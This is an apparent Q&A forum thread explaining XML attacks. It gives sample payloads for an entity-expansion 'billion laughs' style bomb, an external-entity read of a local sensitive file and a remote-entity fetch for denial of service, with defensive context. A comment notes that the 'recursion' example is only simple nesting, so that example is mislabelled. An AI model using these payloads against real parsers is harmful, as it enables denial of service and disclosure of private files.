# xml vulnerabilities

Tags: xml, security

xml has been the backbone of the service oriented application(SOA) and it will be a useful one in the coming future.
As xml is easy , flexible, it can be easily made vulnerable and the attackers can use it for their own purpose.
As such some of the attacks by are **coercive parsing attack, xml external entity(XEE) attack, xml dos(xdos) attack, xml bombs.**
can any one tell in detail about these attacks.
how could one can simulate these attacks practically in a single system?

Answer (score 19, accepted):

First we need to distinguish the *effect* of attack from the *feature* that is exploited.

Particular features of XML that can be exploited are

- XML entities
- Proprietary extension of parser and validator
- Cyclic/recursive references
- Remote access

The effects can be either

- DOS
- Information disclosure

I don't think there is percise definition of a "bomb", but it refers to an attack that is particularly "compact" and which "expands". A "coercive parsing attack" exploits the nature of the XML model to overwhelm the parser.

The examples below are taken from [XML Denial of Service Attacks and Defenses](http://msdn.microsoft.com/en-us/magazine/ee335713.aspx).
Also, if you understand french, read the excellent magazine "[La security des web services](http://www.ed-diamond.com/produit.php?ref=misc43&id_rubrique=&id_rubrique=8)".

**Example 1**

A bomb using entities which result in a DOS because it exhausts the memory

```
<?xml version="1.0"?>
<!DOCTYPE kaboom [
  <!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>
```

If you have 50'000 "aaaa...aaa" and 50'0000 `&a:&a;...&a;`, a payload of 200KB expands to more than 2GB in memory

**Example 2**

An entity could be used to access another file in a unauthorized way. This leads to information disclosure.

```
<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file SYSTEM "/sensitive.txt" >
]>
<tag> &file; </tag>
```

**Example 3**

Using the ability of certain parser to access remote resources (see [http://www.ibm.com/developerworks/xml/library/x-tipgentity.html)](http://www.ibm.com/developerworks/xml/library/x-tipgentity.html), now go figure what happens if the file `bigfile.xml` is 2GB. This probably leads to a DOS.

```
<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file  SYSTEM "http://www.mysite.com/bigfile.xml" >
]>
<tag> &file; </tag>
```

**Example 4**

This recursion will lead to memory exhaust and probably a DOS.

```
<!ENTITY companyname "Contoso Inc.">
<!ENTITY divisionname "&companyname; Web Products Division">
```

If this is schoolwork, then you should also think about how you can **protect** yourself from such attack.

Comment: Perhaps I'm being obtuse here, but can someone explain the recursion in Example 4? As far as I can tell, `&companyname;` will expand to "Contoso Inc." and `&divisionname;` will expand to "Contoso Inc. Web Products Division". I don't see how either of these could cause a problem.

Comment: @squeamishossifrage If you go to the link that the examples are pulled from you'll get a much clearer explanation.  The example given here for recursion is not a recursion example in the article, just a simple nesting example.  In addition, the recursion attack would only work if your parser allows invalid XML as described in the article.